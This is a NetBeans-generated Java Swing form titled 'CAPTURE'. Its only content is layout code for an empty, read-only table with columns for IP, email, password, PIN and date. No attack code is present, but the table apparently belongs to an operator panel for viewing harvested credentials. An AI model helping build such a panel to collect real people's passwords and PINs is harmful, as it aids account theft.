/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package views;

/**
 *
 * @author Poseidon
 */
public class jCapture extends javax.swing.JInternalFrame {

    /**
     * Creates new form jCapture
     */
    public jCapture() {
        initComponents();
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jAdministracionfw = new javax.swing.JLabel();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTCapture = new javax.swing.JTable();

        setBackground(new java.awt.Color(0, 0, 0));
        setClosable(true);

        jAdministracionfw.setBackground(new java.awt.Color(0, 0, 0));
        jAdministracionfw.setFont(new java.awt.Font("Garamond", 1, 36)); // NOI18N
        jAdministracionfw.setForeground(new java.awt.Color(255, 255, 255));
        jAdministracionfw.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        jAdministracionfw.setText("CAPTURE");

        jScrollPane1.setBackground(new java.awt.Color(0, 0, 0));
        jScrollPane1.setBorder(null);
        jScrollPane1.setForeground(new java.awt.Color(255, 255, 255));

        jTCapture.setBackground(new java.awt.Color(0, 0, 0));
        jTCapture.setFont(new java.awt.Font("Garamond", 1, 14)); // NOI18N
        jTCapture.setForeground(new java.awt.Color(255, 255, 255));
        jTCapture.setModel(new javax.swing.table.DefaultTableModel(
            new Object [][] {

            },
            new String [] {
                "IP", "CORREO", "PASSWORD", "PIN", "Fecha"
            }
        ) {
            Class[] types = new Class [] {
                java.lang.String.class, java.lang.String.class, java.lang.String.class, java.lang.Integer.class, java.lang.Object.class
            };
            boolean[] canEdit = new boolean [] {
                false, false, false, false, false
            };

            public Class getColumnClass(int columnIndex) {
                return types [columnIndex];
            }

            public boolean isCellEditable(int rowIndex, int columnIndex) {
                return canEdit [columnIndex];
            }
        });
        jScrollPane1.setViewportView(jTCapture);
        if (jTCapture.getColumnModel().getColumnCount() > 0) {
            jTCapture.getColumnModel().getColumn(0).setResizable(false);
            jTCapture.getColumnModel().getColumn(1).setResizable(false);
            jTCapture.getColumnModel().getColumn(2).setResizable(false);
            jTCapture.getColumnModel().getColumn(3).setResizable(false);
            jTCapture.getColumnModel().getColumn(4).setResizable(false);
        }

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                .addGap(0, 0, Short.MAX_VALUE)
                .addComponent(jAdministracionfw, javax.swing.GroupLayout.PREFERRED_SIZE, 670, javax.swing.GroupLayout.PREFERRED_SIZE))
            .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 650, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addComponent(jAdministracionfw, javax.swing.GroupLayout.PREFERRED_SIZE, 70, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 308, Short.MAX_VALUE)
                .addContainerGap())
        );

        pack();
    }// </editor-fold>//GEN-END:initComponents


    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JLabel jAdministracionfw;
    private javax.swing.JScrollPane jScrollPane1;
    public javax.swing.JTable jTCapture;
    // End of variables declaration//GEN-END:variables
}
